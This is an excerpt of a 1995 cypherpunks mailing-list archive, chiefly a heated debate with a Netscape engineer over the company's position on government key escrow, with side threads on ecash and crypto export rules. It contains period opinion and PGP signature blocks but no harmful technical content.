> changed to "GAK marketing expert" however.

  I'm sorry my dig at the ITAR does not ammuse you.  Your suggested
replacement would not be appropriate since I don't support GAK (I believe
that it is one of the most evil things any government could do to its
citizens), and I'm not in marketing.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sun, 3 Dec 1995 14:04:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512030545.AAA01728@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The recent flap over Netscape and GAK ought to serve as a wakeup call and
a reminder of the advantages the anarchstic GNU/FSF paradigm of software 
development has over the corporate model.

No one can control GNU code, and no entity can impose changes on everyone
else.  If everyone was using GNU browsers and ssl servers right now we'd
be safe.

Competing with Netscape is obviously something that's easier said than
done.  But we ought to consider the strategic importance of having robust,
free, open source packages for security applications, even if affordable
and high quality commercial products exist. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:10:11 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu>
Message-ID: <30C16484.443@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> Why not say:
> 
>         1       Netscape will follow all laws and regulations.
>         2       The current rules are forcing Netscape to choose
>                 between providing reasonable levels of privacy
>                 to its customers and competing in the international
>                 marketplace.
>         3       Netscape feels the rules should be changed to make
>                 this choice unnecessary.

  I think this is what we are trying to do.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 1995 17:06:51 +0800
To: sameer <sameer@c2.org>
Subject: Re: prototype slot-machine
Message-ID: <199512030850.AAA03618@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 PM 12/2/95 -0800, sameer wrote:
>	I've written up a slot-machine thing for ecash, very
>experimental, very buggy, not very slick, (i'd like to get the
>technical bugs worked out before i put a fancy wrapper on it) and i'd
>*like* to announce it here for testing, but I'm worrying about
>gambling laws.. 
>	any thoughts?

Use the demo digicash; it's not real money, and it's never been
illegal to play for poker chips.  The mere fact that there's an exchange
market for real money vs. digicash play money doesn't change that.  
It'd be nice if you take small bets, since many of us only have $100
or so of play money; quarters should be fine.

To do the job right, you need audio....
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:14:30 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <2.2b7.32.19951203004908.0087902c@mail.teleport.com>
Message-ID: <30C1660F.47EA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> 
> At 11:01 PM 12/1/95 -0800, you wrote:
> >
> >  I had lunch with Jim Clark today, and explained the furor that was
> >currently going on in cypherpunks and elsewhere.  After lunch he sent
> >me the e-mail that I've attached below to pass along.  I think the gist
> >of it is that if governments require key escrow, we will have to do it
> >in order to sell our products with encryption into those countries.
> [rest removed for brevity]
> 
> Well someone has to say it...
> 
> "I am glad to see that Jim Clark is no longer hocking up GAK."
> 
> I just hope Netscape does not get seduced by the dark side of the feds and
> impliment GAK "because they have to".  It is one thing to have cryptography
> that is brute forcable in a few weeks, it is another to have a secret key
> that some nosey government agent use to decrypt it in seconds.  If Netscape
> impliments GAK I will move to something else because I will not be able to
> trust that some other nasty surprise will exist in the software.  (As well
> as having no real security left in the product.)

  I don't think you will ever be in this position.  If we are forced implement
GAK by the government, everyone else will too.

> Do I beleive that Netscape will impliment GAK in the near future?  Not
> really.  Not unless they go through another purge like the one back in
> February(?), but I do not see that as being very likely.  (With the current
> IPO, news of a employee purge would probibly drive down the stock and that
> would be the last thing the top brass would want.)

  There was never a "purge" in Netscape engineering.  What you are referring
to happened right before I got here.  As I understand it, it was localized
to the customer support organization(which is why you know about it I assume),
and mostly involved contractors.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:20:46 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
Message-ID: <30C16890.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> PeterWiltshire writes:
> > I emailed Jim Clark day before yesterday about his comments re key escrow.
> > He responded.  As it's not good form to post private email, might I suggest
> > that one of the 'elders' here put to Jim a list of questions on the proviso
> > that his answers can be posted to the list.  You never know, a lot of
> > speculation might be confirmed or denied.
> 
> Why doesn't he just post on his own? Its not like this mailing list is
> unknown -- we got him bad press on the cover of the Times in the
> past. Anyone is free to send email here.

  Jim offered to send to the list directly, but given the recent gripes
about non-subscribers spamming the list, I thought it might be in bad
form, and offered to forward it to the list for him.  He doesn't really
have time to read cypherpunks himself.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 17:34:12 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <30C162DD.1E2F@netscape.com>
Message-ID: <199512030920.BAA11667@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   Can't I be a supporter of strong crypto, and also be in it for the money?
> Many people here make good money off of crypto related work.  If I'm asked
> to implement GAK in a situation where it is not mandated by law, I won't
> do it.

	Yes. You don't have to work at Netscape to make money doing
crypto. Witness the various crypto-related startups who do not support
key escrow. Comsec partners, electric communities, community
connexion, etc.
	(Not that you can't be a supporter of strong crypto and work
for netscape at the same time. The jury [in my mind] is still out on
that one)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 18:31:42 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C0EE0D.48A9@netscape.com>
Message-ID: <30C178F1.1DC3@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> 
> > Black Unicorn wrote:
> 
> > > AT&T seems to have been suitably 'incentivized'
> > > The receipt of government funding (in whatever guise) might be just as
> > > powerful in this case.
> > >
> > > To the outsider, it looks as if Netscape 'owes' the government.
> >
> >   We do owe the government.  They have paid us for Servers and Clients
> > that support Fortezza.  That is what we owe them.  The money that the
> > NSA gave us for Fortezza is not very significant compared to what we
> > are getting from commercial sources.
> 
> Obviously it was significant enough to take.  It was also a perfect
> opportunity for Netscape to express concerns about the future of the
> technology, which is in netscape's interest.  The astute deal maker would
> be happy to work with the NSA on his own terms.  Instead, it
> would appear that Netscape is working FOR NSA on their terms.

  I wasn't aware that you were privy to the details of the contract.

> > > > We are actively lobbying in washington to get clarification of the
> > > > current regulations so that we can provide the US version via an "export
> > > > controlled" FTP or HTTP download.
> > >
> > > With which firm?  Or have you made it an in-house effort?
> >
> >   We have recently hired a government liason person to manage our policy
> > discussions with the government.  He is one of the people that will be
> > talking to congressional and white house representatives next week.
> > I don't know if we have made use of any outside lobbying firms.
> 
> I'd be interested to know what a 'government liason person' is.  It
> sounds to me like an 'in house lobbist.'  There is an old joke in the
> beltway about in house lobbists.
> 
> I also would like to know why you are actively lobbying for
> 'claification' rather than 'modification' of the current policy.

  We are asking for both.  We want to know what we have to do to make
our US version available for FTP download to everyone who is legally
allowed to use it, without violating the current law.  We also want
the export restrictions removed so that we can ship the same stuff
to other countries.  The former is a short term goal while the
latter will likely turn into a longer term effort.

> Netscape seems to be taking the position, "We'd love it if you'd let us
> do X, but we are happy to roll over for whatever."

  So you consider not breaking the law to be "rolling over"?  You have
the luxury of hiding behind anonymity.  We don't.

>  and  "By the way,
> what is the rule on exporting software again?"

  Doesn't everyone want to know this?  Do you think that the ITAR is clear
about the meaning of "export" in the case of FTP and the internet?

> I am impressed that some effort is being made.  I think it in the form of
> 'too little, too late.'  But hey, who am I?

  Four months ago we did not have lots of money in the bank.  People seem
to forget that this still a young and small company.  Perhaps the current
valuation is blinding obscuring this.  Now that we have more resources at our
disposal hopefully we can help make a difference.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sun, 3 Dec 1995 10:28:14 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <Pine.SUN.3.91.951202200809.12018A-100000@polaris.mindport.net>
Message-ID: <30c10224.23418425@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
<unicorn@schloss.li> wrote:

>On Sat, 2 Dec 1995, Jeff Weinstein wrote:
>
>> Black Unicorn wrote:
>
>> > AT&T seems to have been suitably 'incentivized'
>> > The receipt of government funding (in whatever guise) might be just as
>> > powerful in this case.
>> > 
>> > To the outsider, it looks as if Netscape 'owes' the government.
>> 
>>   We do owe the government.  They have paid us for Servers and Clients
>> that support Fortezza.  That is what we owe them.  The money that the
>> NSA gave us for Fortezza is not very significant compared to what we
>> are getting from commercial sources.
>
>Obviously it was significant enough to take.  It was also a perfect 
>opportunity for Netscape to express concerns about the future of the 
>technology, which is in netscape's interest.  The astute deal maker would 
>be happy to work with the NSA on his own terms.  Instead, it 
>would appear that Netscape is working FOR NSA on their terms.

If you read what they had to say about this, you know that they are
hoping others will create non-escrowed crypto hardware using the same
interface.  I see no reason for them to not include support for any
available hardware system (even if it includes GAK), as long as they
continue to support non-escrowed encryption internally.  This allows
the customer to decide that they have no problem with GAK and use the
external system, or use the internal system and not have GAK.

>> > > We are actively lobbying in washington to get clarification of the
>> > > current regulations so that we can provide the US version via an "export
>> > > controlled" FTP or HTTP download.
>> > 
>> > With which firm?  Or have you made it an in-house effort?
>> 
>>   We have recently hired a government liason person to manage our policy
>> discussions with the government.  He is one of the people that will be
>> talking to congressional and white house representatives next week.
>> I don't know if we have made use of any outside lobbying firms.
>
>I'd be interested to know what a 'government liason person' is.  It 
>sounds to me like an 'in house lobbist.'  There is an old joke in the 
>beltway about in house lobbists.
>
>I also would like to know why you are actively lobbying for 
>'claification' rather than 'modification' of the current policy.

Until the current policy is clearly defined it is like a moving
target.  Once the government has been pinned down to a single policy,
it will be much easier to dispute their policies.  Currently the
government can say anything they want about their enforcement of ITAR,
because they have not stated a clear set of rules with regard to it.
Once they have set clear rules, those rules can be shown to be overly
restrictive or even unenforceable.

Also, lawyers usually advise clients based on a worst case scenario,
thus when the government is unclear on its rules, the lawyers advise
their clients based upon the worst possible interpretation of the law.
This is done to protect their client.  By not stating a policy, the
government is making that worst case happen, without having to be the
bad guy by actually attempting to enforce such a policy.

>
>Netscape seems to be taking the position, "We'd love it if you'd let us 
>do X, but we are happy to roll over for whatever."  and  "By the way, 
>what is the rule on exporting software again?"
>
>I am impressed that some effort is being made.  I think it in the form of 
>'too little, too late.'  But hey, who am I?

I think you are being too critical, they have done more than any
company I know of to make easy to use crypto widely available.  They
may be willing to obey the laws if they require GAK, but I do not feel
that they are just rolling over either.  I strongly oppose GAK, but I
do not believe that no crypto is better than GAK crypto.  I would
rather keep some people out than nobody out.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 1995 09:32:34 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512030120.CAA06452@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alan Olsen <alano@teleport.com> wrote:
>>Is there any way one could set up a dirty pictures web
>>page in such a fashion that it would be difficult, painful,
>>and impractical to get at the pictures through that page
>>with a netscape browser?
>
>It would not be very hard.  You just need to have all connections go
through
>a CGI script first.  There is a variable that reports the client to the
>server.  Just bounce them to an error if the variable starts with "Mozilla"

>
>Also, you do not need access to the server code to do this if you are using
>NCSA.  There is a way you can force execution of CGI scripts from your
local
>directory using an .htaccess file.  (It requires using an "addtype" command
>to enable the cgi parsing.)  I will have to dig out the exact mime type
>required.

A much simpler method exists for serving special documents dependent on
client profile, provided you are using Apache 0.8.x (I know sameer is). See
http://www.apache.org/docs/content-negotiation.html

I suppose someone should ask: what is the crypto relevance of this thread?
None.

Wilhelm Busch

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMD6xoiUi5SQtQ3tAQHk4Af/Z9aODx5rNHtY7KG7ekNDASfr/Mv6oLh9
GVUzHgBvuMnDBnvf963XT/FYpr3EMYZxbXUx/Y7b0mb0walw21/1cVp+W3NCRwse
Di/7V6p1jmHESLAYJbM0CfLS0Tm82Q+jU1XRmuHVt4pBPK06gQI65uErlNNmkt0h
ZUMifhmn1vgQmdSMSHJyWzKB9PNi5ucoR2o1lt74LAfkV25wiHxcHSSOMvGvvRNL
G52EjucDL8XEqzDMo3yO+ilWrf3yGgF/HaqzrugVpThgaJIxCYsMm+pF6MHO2wJk
2308thIEC5LrF+eSnO+duYAFpKsG0YNBEljG5zG3bFp8rd8N+D8yZQ==
=G8Wv
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQEPAzC9XzIAAAEIAMJ9b1kiyvrhoa5OGf7G1hSt6yWmzX7napWo5qRAh+xUE+Ue
ftxUmGE1p/lFoUJIRKhH2I0yktcp3Wirmm61rIfJ5S0s9BnE3W+Uk8B1jxim2JvZ
ezOPn0so+dUJP4tvtzDQZDCk5VGTsJkMAvhxahripQKpkWC5qL9nM9cvKa2ZnFjT
8NRaaAx1eMST/k4ntc431jFXNgnBDrxNBb8RNMb7b7jtFGOFN8Y3Mj5TmprXps2V
ydtL57Z85MKfFjkAMeMtugqieJBWEsqA3C1/wKhB9cKb1Rdu/97VpZ0v+FQe9Y1k
qwsQ78chNzBpfHjxSSuo8T4NV0AZiJSLlJC1De0AEQEAAbQNV2lsaGVsbSBCdXNj
aA==
=/fpw
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 1995 09:56:00 +0800
To: cypherpunks@toad.com
Subject: Fight.comp.crime.like.a.paranoid.FBI.psycho
Message-ID: <199512030145.CAA06945@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Coming to Terms with Computer Crime

   Computer Crime: A Crimefighter's Handbook
   David Icove, Karl Seger, and William VonStorch
   O'Reilly and Associates Inc., $24.95; 800-998-9938
   ISBN: 1-56592-086-4.

By Don Willmot

If you tend to be a paranoid type of person, Computer
Crime: A Crimefighter's Handbook will keep vou up at
night pondering the incredible number of computer crimes
that people can commit and the difficulties involved in
stopping them.

The book, split into sections that deal with defining
computer crimes. preventing them, and handling them, is
loaded with fascinating facts. When you stop to think
about it. the number of different types of crime is
alarming: sabotage. revenge, vandalism, theft,
eavesdropping, even "data diddling." For each type of
attack, the book suggests preventive measures and
strategies, all in commonsense style and plain English.

You'll feel like an FBI agent as you read the personality
profiles of different types of computer criminals.
Hackers, crackers, and vandals are all psychoanalyzed,
and interesting charts of "vulnerabilities" and
"countermeasures" will help you make plans to keep your
organization safe from outside attack. The book includes
discussions of everything from choosing locks and keys to
interviewing personnel, setting up "concentric circles"
of defense perimeters, and forming a crisis-management
team to handle the fallout from a successful computer
crime. There's even an entire page devoted to all the
passwords you should never use.

Almost one-third of the book is given over to the actual
text of federal and state laws used to prosecute computer
crime. This section is meant not to be read but to be
used instead as a reference.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Dec 1995 17:06:31 +0800
To: cypherpunks@toad.com
Subject: Re: Questions/Comments on ecash protocol (fwd)
Message-ID: <v02120d00ace710acf043@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
[parts elided]

>BTW since apparently both deposit and payment messages are not encrypted,
>coins made out to "@" are in danger of being stolen both while en route
>from customer to shop and from shop to bank.  This is significant from
>the point of view of payee anonymous systems, which will need to use such
>coins.  More encryption will be necessary when such coins are passed
>around.

Absolutely. Wildcard coins are stealable in transit. However, one might
safely assume that transactions conducted using such coins be encrypted by
other methods.

>Well, I would think identification of the payer's bank will be
>necessary for any coin based system so you know where to cash in the
>coins, so I don't think this is going to go away.  Of course as of now
>everyone has the same bank so it is not an issue.

Your analysis is correct. The good news, for the free marketers on this
list :-), is that there will be other banks issuing Ecash in the near
future. However, they are unlikely to offer the flexibility you have with
Mark Twain Bank.

>There is no such thing!  This is one of the most common misconceptions.
>This version of ecash does not trace double spenders.  It prevents double
>spending by checking each coin to make sure it has not already been
>spent.  Tracing of double spending is only necessary in offline systems
>where coins are not checked right away, but that is not present here.

True.

>Very good comments.  I'm sure the next version will be much better if
>they are careful to clear up the kinds of issues you have raised.

Will do.

<insert standard disclaimer here>


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Dec 1995 17:54:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: French crypto restrictions - update ?
In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com>
Message-ID: <199512030829.DAA17614@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, this has nothing to do with Netscape's position on GAK:

Jim Clark writes (via Jeff Weinstein):
> Until recently, France did not even
> allow us to sell products with 40-bit keys, much less 128-bit keys.

I'm curious about this. Were Chirac et compagnie simply dragging their feet
on granting a license, have they made an actual policy change, or did they
realize they could do what Damien did ? It would be interesting to see more
information on this development. (There's a paranoid conspiracy theory I
could add to the pile here, but I don't believe it and we seem to be knee-deep
in them at the moment....)

-Futplex <futplex@pseudonym.com>
Let's wait and see






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 3 Dec 1995 19:02:35 +0800
To: cypherpunks@toad.com
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512031053.DAA24346@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been to Congress.
I have lobbied them personally.

Oct 2nd & 3rd was when.
It wasn't easy.

I also spent time in the Press Galleries.
That was even harder.
I will be there next October, and will be credentialed
for all four of the different galleries.

Mr. Jeff get real.
You company is now on the record for GAK.
It hadn't until then. But now you are.
Now all the lower levels can decry what Mr. Clark said,
but the damage is already done.

And....if you're not, Mr. Jeff, this being the electronic
age and all, why not get Mr. Clark to clarify it, muddy it,
or downright repudiate it as a misquote or something.

I'd love to see that.
So would a lot of others.

But somehow I don't think that is gonna happen.

Love Always,

Carol Anne
ps censored.org is now running ftp at 206.42.112.96 
   on an intermittent basis using serveu1.1 


>Black Unicorn wrote:
>> 
>> On Sat, 2 Dec 1995, Jeff Weinstein wrote:
  
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 1995 02:21:52 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C178F1.1DC3@netscape.com>
Message-ID: <Pine.SUN.3.91.951203053958.24122A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
> > 
> > On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> > 
> > > Black Unicorn wrote:

> > > > To the outsider, it looks as if Netscape 'owes' the government.
> > >
> > >   We do owe the government.  They have paid us for Servers and Clients
> > > that support Fortezza.  That is what we owe them.  The money that the
> > > NSA gave us for Fortezza is not very significant compared to what we
> > > are getting from commercial sources.
> > 
> > Obviously it was significant enough to take.  It was also a perfect
> > opportunity for Netscape to express concerns about the future of the
> > technology, which is in netscape's interest.  The astute deal maker would
> > be happy to work with the NSA on his own terms.  Instead, it
> > would appear that Netscape is working FOR NSA on their terms.
> 
>   I wasn't aware that you were privy to the details of the contract.

Tell me it included discussion about the future of the technology, and 
that at some time during the negotiations the prospect of GAK and 
netscape's concern over the direction of it was discussed.  In the 
alternative, shut up.

It doesn't take a legal genius to figure out what went on in these 
negotiations.  I've been there.  I know what the agendas are, and it's 
clear GAK was not one of them.  Either show me otherwise or sit down.

(And by the way, to brag and make you eat crow, I have seen portions of the 
agreement, and your legal staff is as full of leaks as the titanic.  You
would be wise to pull that card only when you are sure it's not been exposed.
Your agreement is another reason I pulled my stock.  My biggest regret is 
that I don't trust my anonyminity enough to publish the portions I have).

> > I'd be interested to know what a 'government liason person' is.  It
> > sounds to me like an 'in house lobbist.'  There is an old joke in the
> > beltway about in house lobbists.
> > 
> > I also would like to know why you are actively lobbying for
> > 'claification' rather than 'modification' of the current policy.
> 
>   We are asking for both.  We want to know what we have to do to make
> our US version available for FTP download to everyone who is legally
> allowed to use it, without violating the current law.  We also want
> the export restrictions removed so that we can ship the same stuff
> to other countries.  The former is a short term goal while the
> latter will likely turn into a longer term effort.

At no time in here do I hear that you will be actively taking an 
'anti-GAK' position.  That is, that GAK is counterproductive, against the 
interests of the industry and that Netscape is going to take a stand on 
GAK because it is wrong for the industry as a whole.

I don't care what your position is on GAK, I've already sold my stock in 
your spineless company.  What I care about is exactly what kind of 
snowjob you are perpetrating after the fact while claiming to be one of us.

> 
> > Netscape seems to be taking the position, "We'd love it if you'd let us
> > do X, but we are happy to roll over for whatever."
> 
>   So you consider not breaking the law to be "rolling over"?

You seem to think the only options are:

1. Roll over.
2. Break the law.

This is where you fail.

The other option is active work to discourage a GAK system on the whole 
as a farce, and unenforceable, thus a waste and a burden to the industry 
(which in my view, it is).

Unfortunately, Netscape is too interested, clearly, in not rocking the 
boat while the gold is on board.  Again, this is fine, so long as you 
don't come to us claiming to be the peacemaker.  That's crap.

> You have the luxury of hiding behind anonymity.  We don't.

No apologies necessary.

> >  and  "By the way,
> > what is the rule on exporting software again?"
> 
>   Doesn't everyone want to know this?  Do you think that the ITAR is clear
> about the meaning of "export" in the case of FTP and the internet?

No.  I don't care what is.  As long as it is not "we know strong crypto 
is inevitable, and thus we cannot hope to enforce a lesser standard," 
then it is clearly unacceptable -  (See Bill Gates, who despite my 
provincial mac preference, has earned my investment dollar ten times over on
ethics issue v. netscape.  I hope you realize exactly what that means).

> > I am impressed that some effort is being made.  I think it in the form of
> > 'too little, too late.'  But hey, who am I?
> 
>   Four months ago we did not have lots of money in the bank.  People seem
> to forget that this still a young and small company.  Perhaps the current
> valuation is blinding obscuring this.  Now that we have more resources at our
> disposal hopefully we can help make a difference.

All the smallest violins in the world are, I am sure, playing for you.

You'd make a difference if you would evolve to the point where you have a 
backbone.  Given your position in the short lived 'hype' of the high tech 
market, I would think you would make as much of your time in the 
spotlight as you could.  Especially if the market ever wises up to the 
snowjob you are doing.  (I speak of the company, if not the individual, 
not that I doubt either of the capacity individually).


> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 
---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 1995 18:14:06 +0800
To: Dan Weinstein <djw@pdcorp.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30c10224.23418425@email.pdcorp.com>
Message-ID: <Pine.SUN.3.91.951203060612.24122C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Dan Weinstein wrote:

> On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn
> <unicorn@schloss.li> wrote:
> 
> >On Sat, 2 Dec 1995, Jeff Weinstein wrote:
> >
> >> Black Unicorn wrote:

> >> > To the outsider, it looks as if Netscape 'owes' the government.
> >> 
> >>   We do owe the government.  They have paid us for Servers and Clients
> >> that support Fortezza.  That is what we owe them.  The money that the
> >> NSA gave us for Fortezza is not very significant compared to what we
> >> are getting from commercial sources.
> >
> >Obviously it was significant enough to take.  It was also a perfect 
> >opportunity for Netscape to express concerns about the future of the 
> >technology, which is in netscape's interest.  The astute deal maker would 
> >be happy to work with the NSA on his own terms.  Instead, it 
> >would appear that Netscape is working FOR NSA on their terms.
> 
> If you read what they had to say about this, you know that they are
> hoping others will create non-escrowed crypto hardware using the same
> interface.  I see no reason for them to not include support for any
> available hardware system (even if it includes GAK), as long as they
> continue to support non-escrowed encryption internally.  This allows
> the customer to decide that they have no problem with GAK and use the
> external system, or use the internal system and not have GAK.

I read it quite carefully.  I just was not as easily taken in by the 
double speak as you were.

Hoping others will do something is about as useful as sitting on your thumb.

Netscape is in a position to make some policy impact here.  If they 
insist on going another way, I want to hear why, not that they are all on 
our side and we should be nice because really we're all in this together, 
and afterall, Netscape isn't such a bad lot.

They can support whoever they like.  I just want to hear WHY.  More 
importantly, I don't want to be snowed with some horse hockey answer.  It 
insults my intelligence.  Yours was obviously unaffected.

> >I'd be interested to know what a 'government liason person' is.  It 
> >sounds to me like an 'in house lobbist.'  There is an old joke in the 
> >beltway about in house lobbists.
> >
> >I also would like to know why you are actively lobbying for 
> >'claification' rather than 'modification' of the current policy.
> 
> Until the current policy is clearly defined it is like a moving
> target.  Once the government has been pinned down to a single policy,
> it will be much easier to dispute their policies.  Currently the
> government can say anything they want about their enforcement of ITAR,
> because they have not stated a clear set of rules with regard to it.
> Once they have set clear rules, those rules can be shown to be overly
> restrictive or even unenforceable.

I believe you actually think you are teaching me something here.

I said before, and I will say again.  If Netscape is against GAK, then 
let them be AGAINST GAK.  If they are just going to try and finesse their 
way into the market without making to many waves, let's hear it that way 
instead of some crap about how they are 'lobbying actively against GAK' 
(Which I might point out, is an assertion that fell apart at the most 
basic prodding).

> Also, lawyers usually advise clients based on a worst case scenario,
> thus when the government is unclear on its rules, the lawyers advise
> their clients based upon the worst possible interpretation of the law.
> This is done to protect their client.  By not stating a policy, the
> government is making that worst case happen, without having to be the
> bad guy by actually attempting to enforce such a policy.

I really think you are pompus enough to think you are teaching people 
things they don't know here.

I invite you to re-read the entire conversation and discover, as an 
exercise, that the issue is not what the government is or is not doing, 
but what netscape is or is not doing.  I could care about Netscape's 
loose-lipped lawyers.

> >
> >Netscape seems to be taking the position, "We'd love it if you'd let us 
> >do X, but we are happy to roll over for whatever."  and  "By the way, 
> >what is the rule on exporting software again?"
> >
> >I am impressed that some effort is being made.  I think it in the form of 
> >'too little, too late.'  But hey, who am I?
> 
> I think you are being too critical, they have done more than any
> company I know of to make easy to use crypto widely available.

0 + .00001 = .00001

Yes, just as last time you checked, .00001 is still more than 0.

> They
